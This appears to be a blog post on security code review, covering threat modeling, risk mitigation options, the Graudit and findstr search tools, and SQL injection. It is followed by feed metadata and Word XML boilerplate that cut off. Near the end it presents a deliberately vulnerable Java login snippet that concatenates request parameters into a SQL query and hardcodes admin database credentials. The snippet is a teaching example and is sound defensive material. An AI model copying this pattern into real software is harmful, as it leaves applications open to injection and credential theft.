But first lets define what is a security source code review. A security code review is a systematic examination of a Web Application source code that is intended to find and fix security mistakes overlooked in the initial development phase, improving both the overall security of the software. Reviews are done in various forms such as pair programming, informal walkthroughs, and formal inspections. It is often done by independent contractors or an internal security team, hiring a third independent party to perform the code review adds value because it gives to the company the chance to examine its code by a person that has been engaged in the last stage of the development process and has no <i>"emotional attachements to the code"</i> therefor has a unique perspective on the subject.<br />
<br />
<b>Types of code review</b><br />
<br />
Code review practices fall into three main categories: 1) pair programming, 2) formal code review and 3) lightweight code review. Formal code review, such as a Fagan inspection, involves a careful and detailed process with multiple participants and multiple phases. Formal code reviews are the traditional method of review, in which software developers attend a series of meetings and review code line by line, usually using printed copies of the material. Formal inspections are extremely thorough and have been proven effective at finding defects in the code under review. Lightweight code review typically requires less overhead than formal code inspections, though it can be equally effective when done properly.<br />
<br />
Lightweight reviews are often conducted as part of the normal development process:<br />
<ol>
<li>Over-the-shoulder – One developer looks over the author's shoulder as the latter walks through the code.</li>
<li>Email pass-around – Source code management system emails code to reviewers automatically after checkin is made.</li>
<li>Pair Programming – Two authors develop code together at the same workstation, such is common in Extreme Programming.</li>
<li>Tool-assisted code review – Authors and reviewers use specialized tools designed for peer code review.</li>
</ol>
<b>Important note:</b> Tools can be used to perform this task but they always need human verification. Tools do not understand context, which is the keystone of security code review. Tools are good at assessing large <u>amounts of code and pointing out possible issues but a person needs to verify every single result to determine if it is a real issue, if it is actually exploitable, and calculate the risk to the enterprise</u>. <br />
<br />
<b>What is the most important thing in a code review</b><br />
<br />
The most important is applying the proper Thread modeling. <u>Threat modeling is an approach for analyzing the security of an application</u>. It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application. Threat modeling is not an approach to reviewing code but it does complement the security code review process. The inclusion of threat modeling in the SDLC can help to ensure that applications are being developed with security built-in from the very beginning. This, combined with the documentation produced as part of the threat modeling process, can give the reviewer a greater understanding of the system. This allows the reviewer to see where the entry points to the application are and the associated threats with each entry point. The concept of threat modeling is not new but there has been a clear mindset change in recent years.<br />
<br />
Modern threat modeling looks at a system from a potential attacker's perspective, as opposed to a defender's view point. Microsoft have been strong advocates of the process over the past number of years. They have made threat modeling a core component of their SDLC which they claim to be one of the reasons for the increased security of their products in recent years.<br />
<br />
There are at least three general approaches to threat modeling:<br />
<br />
<b>Attacker-centric</b><br />
<br />
Attacker-centric threat modeling starts with an attacker, and evaluates their goals, and how they might achieve them. Attacker's motivations are often considered, for example, "The NSA wants to read this email," or "Jon wants to copy this DVD and share it with his friends." This approach usually starts from either entry points or assets.<br />
<br />
<b>Software-centric</b><br />
<br />
Software-centric threat modeling (also called 'system-centric,' 'design-centric,' or 'architecture-centric') starts from the design of the system, and attempts to step through a model of the system, looking for types of attacks against each element of the model. This approach is used in threat modeling in Microsoft's Security Development Lifecycle.<br />
<br />
<b>Asset-centric</b><br />
<br />
Asset-centric threat modeling involves starting from assets entrusted to a system, such as a collection of sensitive personal information.<br />
<br />
<b>The threat modeling</b><br />
<br />
<div>
The threat modeling process can be decomposed into 3 high level steps:</div>
<div>
<br />
<b>Step 1: </b>Decompose the Application:<br />
<ul>
<li>Create use-cases to understand how the application is used.</li>
<li>Identifying entry points.</li>
<li>Identifying assets.</li>
<li>Identifying trust levels to external entities.</li>
</ul>
</div>
<div>
<b>Note:</b> This stage has to do with understanding the context of the Web Application and its surrounding entities.</div>
<div>
<br /></div>
<div>
The following images show the Business Architecture (Business Owner's Perspective) and Business Architecture Behavior of a Web Application:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEtTUTuCe1nrKpW_Rq_tf8I5WojUFaYc2Z723VL7E6kV974GKnZ9a9lrS22AXh8C31KcWfWA_Nf4ZP3DkWq9RM0Q8WFVMgbhZLm_QsWL1XU1-_hcboz05JZ-C2QPHBJZ6OdvN-pwpw-q8/s1600/Business_structure_model.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEtTUTuCe1nrKpW_Rq_tf8I5WojUFaYc2Z723VL7E6kV974GKnZ9a9lrS22AXh8C31KcWfWA_Nf4ZP3DkWq9RM0Q8WFVMgbhZLm_QsWL1XU1-_hcboz05JZ-C2QPHBJZ6OdvN-pwpw-q8/s1600/Business_structure_model.gif" /></a></div>
<div>
<br />
<div>
<b>Note:</b> Lists the entities important to the business. Business entities can be a person, a thing or a concept that is part of or interacts with the business process (Proforma 2003). In the example of "XYZ-Match", the business entities include the following: Investors, Entrepreneurs, "XYZ-Match" web system.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNo8QHek88F5yKFjbknj06ZcGyytbuT6bVLMF35SoiLTRn8wrAN70exf6bi8vJFiKWYlMUB9z9pn3a6X_SbZlDvURiiL9a3SPEyfO0RbTAXJlXIM4jSCCaaPkb7wBEA3WS-L2GC0QnTlU/s1600/Business_process_model1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNo8QHek88F5yKFjbknj06ZcGyytbuT6bVLMF35SoiLTRn8wrAN70exf6bi8vJFiKWYlMUB9z9pn3a6X_SbZlDvURiiL9a3SPEyfO0RbTAXJlXIM4jSCCaaPkb7wBEA3WS-L2GC0QnTlU/s1600/Business_process_model1.gif" /></a></div>
<div>
<br /></div>
<b>Note:</b> Lists the processes in which the business operates. In the example of "XYZ-Match", "Investor listing information to Venture Capital Directory" is one of such business processes. </div>
<div>
<br />
<b>Step 2:</b> Determining and rank threats or else the threat categorization methodology:<br />
<ul>
<li>Auditing & Logging</li>
<li>Authentication</li>
<li>Authorization</li>
<li>Configuration Management</li>
<li>Data Protection in Storage and Transit</li>
</ul>
</div>
<b>Note</b>: This stage has to do with mapping the vulnerabilities to a category. <br />
<br />
Threat listing is an important part of a Web Application code auditing. Threat lists based on the STRIDE model for example are useful in the identification of threats with regards to the attacker goals. For example, if the threat scenario is attacking the login, would the attacker brute force the password to break the authentication? If the threat scenario is to try to elevate privileges to gain another user’s privileges, would the attacker try to perform forceful browsing? Categorizing and grouping the Web Application threats will help to see which Web Application security controls have the majority of the problems, it is like a blinking led that says "Hey I have multiple problems, save me please I am a poor cod dying out, save me".<br />
<b><br /></b>
<br />
<div>
<b>Step 3:</b> Determine countermeasures and mitigation.<br />
<br />
<b>Note:</b> Such countermeasures can be identified using threat-countermeasure mapping lists.The risk mitigation strategy might involve evaluating these threats from the business impact that they pose and reducing the risk.<br />
<br />
The objective of risk management should be to reduce the impact that the exploitation of a threat can have to the application (not to necessarily mitigate the risk!). This can be done by responding to a theat with a risk mitigation strategy. In general there are five options to mitigate threats <br />
<ol>
<li>Do nothing: for example, hoping for the best. </li>
<li>Informing about the risk: for example, warning user population about the risk. </li>
<li>Mitigate the risk: for example, by putting countermeasures in place. </li>
<li>Accept the risk: for example, after evaluating the impact of the exploitation (business impact). </li>
<li>Transfer the risk: for example, through contractual agreements and insurance. </li>
</ol>
</div>
<div>
The decision of which strategy is most appropriate depends on the impact an exploitation of a threat can have, the likelihood of its occurrence, and the costs for transferring (i.e. costs for insurance) or avoiding (i.e. costs or losses due redesign) it.<br />
<ul>
<li>Define the application requirements:</li>
</ul>
<ol>
<li>Identify business objectives</li>
<li>Identify user roles that will interact with the application</li>
<li>Identify the data the application will manipulate</li>
<li>Identify the use cases for operating on that data that the application will facilitate</li>
</ol>
<ul>
<li>Model the application architecture: </li>
<ul>
<li>Model the components of the application</li>
<li>Model the service roles that the components will act under</li>
<li>Model any external dependencies</li>
<li>Model the calls from roles, to components and eventually to the data store for each use case as identified above</li>
</ul>
</ul>
<ul>
<li>Identify any threats to the confidentiality, availability and integrity of the data and the application based on the data access control matrix that your application should be enforcing</li>
<li>Assign risk values and determine the risk responses</li>
<li>Determine the countermeasures to implement based on your chosen risk responses</li>
<li>Continually update the threat model based on the emerging security landscape<b>.</b></li>
</ul>
</div>
<div>
<b>Simple tools to use for code auditing </b><br />
<br />
Graudit is a simple script and signature sets that allows you to find potential security flaws in source code using the GNU utility grep. It's comparable to other static analysis applications like RATS, SWAAT and flaw-finder while keeping the technical requirements to a minimum and being very flexible. Graudit supports scanning code written in several languages; asp, jsp, perl, php and python.<br />
<br />
Graudit usage: <i><span style="color: blue;">graudit /path/to/scan</span></i></div>
<div>
<br /></div>
<div>
Graudit prerequisites: bash, grep, sed </div>
<div>
<br />
The following picture shows a screenshot of the tool:</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0QL4yeCLesret4c-iJk99MlLlq4hOVuxIXgQiamOHYv19Z4w6Cs9bQVrHqowT_SDDz-AzzoiY5XEPaZfFDNaLDC0kP3Ggt4_WmB6LewFj-kvOTZkkmysKtGDwFSQ8DkkNjrPH_MvytWY/s1600/graudit.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0QL4yeCLesret4c-iJk99MlLlq4hOVuxIXgQiamOHYv19Z4w6Cs9bQVrHqowT_SDDz-AzzoiY5XEPaZfFDNaLDC0kP3Ggt4_WmB6LewFj-kvOTZkkmysKtGDwFSQ8DkkNjrPH_MvytWY/s1600/graudit.jpeg" /></a></div>
<div>
<b><br /></b></div>
<div>
<b>Note:</b> You can download Graudit from this <a href="http://www.justanotherhacker.com/projects/graudit.html">link</a>. The basic concept behind this tool is to that you provide the tool with a list chunk of code lines searches for them. As an alternative of Graudit you can use common command windows tools such as findstr and find.</div>
<div>
<br /></div>
<div>
The findstr command line windows tools allows to search for text (as specified with pattern in the file file-name. If file-name contains wildcards (* or ?), it searches in all files that match. The option /S searches in the current directory as well as in its subdirectories. If pattern contains spaces, it must be specified like so /C:"some text to be searched". In order to turn pattern into a regular expressions, the /R option must be used. The /I option searches case insensitive. It is possible to pipe the result of another command through findstr. </div>
<div>
<br /></div>
<div>
For example, the following command finds all files whose name contain either an m or a p: </div>
<div>
<i><span style="color: blue;"><br /></span></i></div>
<div>
<i><span style="color: blue;">C:\> dir /B | findstr /R /C:"[mp]"</span></i></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<br />
<b>Note: </b>You can find more examples for findstr in the Microsoft command line page.<br />
<br />
<b>Cod(e) reviewing for SQL Injection</b><br />
<br />
Use Database stored procedures, but even stored procedures can be vulnerable. Use parameterized queries instead of dynamic SQL statements. Data validate all external input: Ensure that all SQL statements recognize user inputs as variables, and that statements are precompiled before the actual inputs are substituted for the variables in Java. A simplified way of thinking about SQL injection when talking about security code reviews would be to emphasize in multiple type casting checks through out the whole Web Application system. For example type casting should occur in at least two different places the Web Application input validation filter and the Web Application connected database. Additional layers of defense can be added through a Web Application Firewall (WAF) and a Database Application Firewall. <br />
<br />
The following picture shows a sequence of yes and no flow chart explaining an SQL injection flow:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOHSAh3lCDw0NMmD-BGQfSZJcdMlkvsnhvBDc4Y6maKXoX_wNrhqPQJZJFTzdQ7JyHe-cJ-w30IN6-OGbnPOYj_qZdADgHbAFzJA4_8EYbYZ3nlR20um5JXNiBrlHVSu1djFGxxEv-PBU/s1600/phpAt2vLYPM.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOHSAh3lCDw0NMmD-BGQfSZJcdMlkvsnhvBDc4Y6maKXoX_wNrhqPQJZJFTzdQ7JyHe-cJ-w30IN6-OGbnPOYj_qZdADgHbAFzJA4_8EYbYZ3nlR20um5JXNiBrlHVSu1djFGxxEv-PBU/s1600/phpAt2vLYPM.jpg" /></a></div>
<br />
<br />
<b>Note: </b>This is a very simplified SQL Injection threat model.<br />
<br />
The actual code in java that introduces the SQL Injection vulnerability originally to the code:<br />
<br />
<i><span style="color: lime;">// Define variable to use</span></i></div>
<div>
<i><br /></i></div>
<div>
<i><span style="color: blue;">String</span> DRIVER = <span style="color: #274e13;">"com.ora.jdbc.Driver"</span>;<br /><span style="color: blue;">String</span> DataURL = <span style="color: #274e13;">"jdbc:db://localhost:5112/users"</span>;<br /><span style="color: blue;">String</span> LOGIN =<span style="color: #274e13;"> "admin"</span>;<br /><span style="color: blue;">String</span> PASSWORD = "admin123";<br /><br />Class.forName(DRIVER); </i></div>
<div>
<i><span style="color: #274e13;"><br /></span></i>
<i><span style="color: lime;">//Make connection to DB</span><span style="color: #274e13;"> </span></i></div>
<div>
<i><br />Connection connection = DriverManager.getConnection(DataURL, LOGIN, PASSWORD); <br /><br /><span style="color: blue;">String</span> Username = request.getParameter("USER"); // From HTTP request<br /><span style="color: blue;">String</span> Password = request.getParameter("PASSWORD"); // From HTTP request<br /><span style="color: blue;">int</span> iUserID = -1;<br /><span style="color: blue;">String</span> sLoggedUser = "";<br /><span style="color: blue;">String</span> sel = <span style="color: #274e13;">"SELECT User_id, Username FROM USERS WHERE Username = '" +Username + "' AND Password = '" + Password + "'"; </span><br /><br />Statement selectStatement = connection.createStatement (); <br /><br />ResultSet resultSet = selectStatement.executeQuery(sel);<br /><br />if (resultSet.next()) { </i></div>
<div>
<i> </i></div>
<div>
<i> iUserID = resultSet.getInt(1);<br /><br /> sLoggedUser = resultSet.getString(2); <br />} <br /><br />PrintWriter writer = response.getWriter (); <br /><br />if (iUserID >= 0) { <br /><br /> writer.println (<span style="color: #274e13;">"User logged in: "</span> + sLoggedUser); </i></div>
<div>
<i><br /> } else { <br /> </i></div>
<div>
<i> writer.println (<span style="color: #274e13;">"Access Denied!"</span>) </i></div>
<div>
<i>}</i><br />
<br />
When SQL statements are dynamically created as software executes, there is an opportunity for a security breach as the input data can truncate or malform or even expand the original SQL query. Firstly, the request.getParameter retrieves the data for the SQL query directly from the HTTP request without any data validation (Min/Max length, Permitted characters, Malicious characters). This error gives rise to the ability to input SQL as the payload and alter the functionality in the statement.<br />
<br />
<b>Epilogue</b><br />
<div>
<br /></div>
Educating developers to write secure code is the paramount goal of a secure code review. Taking code review from this standpoint is the only way to promote and improve code quality. Part of the education process is to empower developers with the knowledge in order to write better code. This can be done by providing developers with a controlled set of rules which the developer can compare their code to. Automated tools provide this functionality, and also help reduce the overhead from a time perspective. A developer can check his/her code using a tool without much initial knowledge of the security concerns pertaining to their task at hand. Also, running a tool to assess the code is a fairly painless task once the developer becomes familiar with the tool(s).<br />
<br />
<b>References:</b><br />
<div style="background-color: white;">
<ul>
<li><a href="https://www.owasp.org/index.php/Crawling_Code" target="_blank"><span style="color: blue; font-family: Times, Times New Roman, serif;">https://www.owasp.org/index.<wbr></wbr>php/Crawling_Code</span></a></li>
<li><a href="https://www.owasp.org/index.php/Searching_for_Code_in_J2EE/Java" target="_blank"><span style="color: blue; font-family: Times, Times New Roman, serif;">https://www.owasp.org/index.<wbr></wbr>php/Searching_for_Code_in_<wbr></wbr>J2EE/Java</span></a></li>
<li><a href="https://www.owasp.org/index.php/Searching_for_Code_in_Classic_ASP" target="_blank"><span style="color: blue; font-family: Times, Times New Roman, serif;">https://www.owasp.org/index.<wbr></wbr>php/Searching_for_Code_in_<wbr></wbr>Classic_ASP</span></a></li>
<li><a href="https://www.owasp.org/index.php/JavaScript/Web_2.0_Keywords_and_Pointers" target="_blank"><span style="color: blue; font-family: Times, Times New Roman, serif;">https://www.owasp.org/index.<wbr></wbr>php/JavaScript/Web_2.0_<wbr></wbr>Keywords_and_Pointers</span></a></li>
<li><span style="color: blue; font-family: Times, Times New Roman, serif;"><a href="http://en.wikipedia.org/wiki/Code_review">http://en.wikipedia.org/wiki/Code_review</a></span></li>
<li><span style="color: blue; font-family: Times, Times New Roman, serif;"><a href="https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf">https://www.owasp.org/images/2/2e/OWASP_Code_Review_Guide-V1_1.pdf</a></span></li>
<li><span style="color: blue; font-family: Times, Times New Roman, serif;"><a href="http://ausweb.scu.edu.au/aw04/papers/refereed/kong/paper.html" target="_blank">http://ausweb.scu.edu.au/aw04/papers/refereed/kong/paper.html </a></span></li>
<li><a href="http://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx"><span style="color: blue; font-family: Times, Times New Roman, serif;">http://msdn.microsoft.com/en-us/library/ee823878(v=cs.20).aspx</span></a></li>
<li><a href="http://www.justanotherhacker.com/projects/graudit.html"><span style="color: blue; font-family: Times, Times New Roman, serif;">http://www.justanotherhacker.com/projects/graudit.html</span></a></li>
<li><a href="http://www.adp-gmbh.ch/win/cmd/findstr.html"><span style="color: blue; font-family: Times, Times New Roman, serif;">http://www.adp-gmbh.ch/win/cmd/findstr.html</span></a></li>
<li><a href="http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/findstr.mspx?mfr=true"><span style="color: blue; font-family: Times, Times New Roman, serif;">http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/findstr.mspx?mfr=true</span></a></li>
<li><span style="color: blue; font-family: Times, Times New Roman, serif;">http://en.wikipedia.org/wiki/Threat_model </span></li>
</ul>
</div>
<br />
<br />
<br /></div>
</div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-1946391758616839752012-11-03T13:04:00.004-07:002012-11-06T02:11:24.098-08:00Crypto for pentesters<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>51</o:Words>
<o:Characters>291</o:Characters>
<o:Company>Lamehacker</o:Company>
<o:Lines>2</o:Lines>
<o:Paragraphs>1</o:Paragraphs>
<o:CharactersWithSpaces>341</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="0" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
